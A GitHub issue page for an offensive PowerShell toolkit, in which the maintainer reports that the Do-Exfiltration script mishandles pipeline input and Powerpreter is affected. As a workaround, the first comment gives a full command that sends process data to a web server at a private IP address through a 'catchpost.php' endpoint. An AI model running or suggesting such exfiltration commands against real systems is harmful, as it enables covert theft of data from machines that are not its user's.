Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix pipeline issue with Do-Exfiltration script and Powerpreter #19

Open
samratashok opened this issue Jul 3, 2015 · 1 comment
Open
Assignees

Comments

@samratashok
Copy link
Owner

Do-exfiltration is unable to handle the pipeline input properly. It exfiltrates only the last object returned from the command. Currently, the pipeline should not be used with Do-Exfiltration, instead, use as below:

Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php

@samratashok
Copy link
Owner Author

The issue was reported by an anonymous user by this comment:
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?showComment=1435835570056#c2007721560700630955

Other issues by the user would be raised once reproduced.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

1 participant